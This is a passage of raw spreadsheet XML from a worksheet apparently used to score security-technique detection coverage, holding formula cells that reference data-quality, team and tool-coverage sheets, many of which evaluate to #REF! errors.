        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W60" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X60" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y60" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="61" spans="1:25" ht="256.5" x14ac:dyDescent="0.45">
      <c r="A61" s="8" t="s">
        <v>206</v>
      </c>
      <c r="B61" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C61" s="8" t="s">
        <v>526</v>
      </c>
      <c r="D61" s="10" t="s">
        <v>527</v>
      </c>
      <c r="E61" s="10" t="s">
        <v>528</v>
      </c>
      <c r="F61" s="10" t="s">
        <v>529</v>
      </c>
      <c r="G61" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K61,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H61" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I61" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J61" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K61" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L61" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M61" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N61" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O61" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P61" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q61" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R61" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S61" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T61" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U61" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V61" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W61" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X61" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F61&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F61))-LEN(SUBSTITUTE(TRIM(F61),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y61" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="62" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A62" s="8" t="s">
        <v>65</v>
      </c>
      <c r="B62" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C62" s="8" t="s">
        <v>530</v>
      </c>
      <c r="D62" s="10" t="s">
        <v>531</v>
      </c>
      <c r="E62" s="10" t="s">
        <v>532</v>
      </c>
      <c r="F62" s="10" t="s">
        <v>533</v>
      </c>
      <c r="G62" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K62,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H62" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I62" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J62" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K62" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L62" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M62" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N62" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O62" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P62" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q62" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R62" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S62" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T62" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U62" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V62" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W62" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X62" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F62&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F62))-LEN(SUBSTITUTE(TRIM(F62),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y62" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="63" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A63" s="8" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C63" s="8" t="s">
        <v>534</v>
      </c>
      <c r="D63" s="10" t="s">
        <v>535</v>
      </c>
      <c r="E63" s="10" t="s">
        <v>536</v>
      </c>
      <c r="F63" s="10" t="s">
        <v>537</v>
      </c>
      <c r="G63" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K63,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H63" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I63" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J63" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K63" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L63" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M63" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N63" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O63" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P63" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q63" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R63" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S63" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T63" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U63" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V63" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W63" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X63" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F63&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F63))-LEN(SUBSTITUTE(TRIM(F63),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y63" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="64" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A64" s="8" t="s">
        <v>107</v>
      </c>
      <c r="B64" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C64" s="8" t="s">
        <v>538</v>
      </c>
      <c r="D64" s="10" t="s">
        <v>539</v>
      </c>
      <c r="E64" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F64" s="10" t="s">
        <v>540</v>
      </c>
      <c r="G64" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K64,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H64" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I64" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J64" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K64" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L64" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M64" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N64" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O64" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P64" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q64" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R64" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S64" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T64" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U64" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V64" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W64" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X64" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F64&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F64))-LEN(SUBSTITUTE(TRIM(F64),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y64" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="65" spans="1:25" ht="256.5" x14ac:dyDescent="0.45">
      <c r="A65" s="8" t="s">
        <v>140</v>
      </c>
      <c r="B65" s="8" t="s">
        <v>541</v>
      </c>
      <c r="C65" s="8" t="s">
        <v>542</v>
      </c>
      <c r="D65" s="10" t="s">
        <v>543</v>
      </c>
      <c r="E65" s="10" t="s">
        <v>544</v>
      </c>
      <c r="F65" s="10" t="s">
        <v>545</v>
      </c>
      <c r="G65" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K65,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H65" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I65" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J65" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K65" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L65" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M65" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N65" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O65" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P65" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q65" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R65" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S65" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T65" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U65" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V65" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W65" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X65" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F65&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F65))-LEN(SUBSTITUTE(TRIM(F65),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y65" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="66" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A66" s="8" t="s">
        <v>148</v>
      </c>
      <c r="B66" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C66" s="8" t="s">
        <v>546</v>
      </c>
      <c r="D66" s="10" t="s">
        <v>547</v>
      </c>
      <c r="E66" s="10" t="s">
        <v>548</v>
      </c>
      <c r="F66" s="10" t="s">
        <v>549</v>
      </c>
      <c r="G66" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K66,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H66" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I66" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J66" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K66" s="51">
        <f t="shared" ref="K66:K129" si="8">FLOOR(AVERAGE(H66:J66),1)</f>
        <v>0</v>
      </c>
      <c r="L66" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M66" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N66" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F66&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F66))-LEN(SUBSTITUTE(TRIM(F66),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O66" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
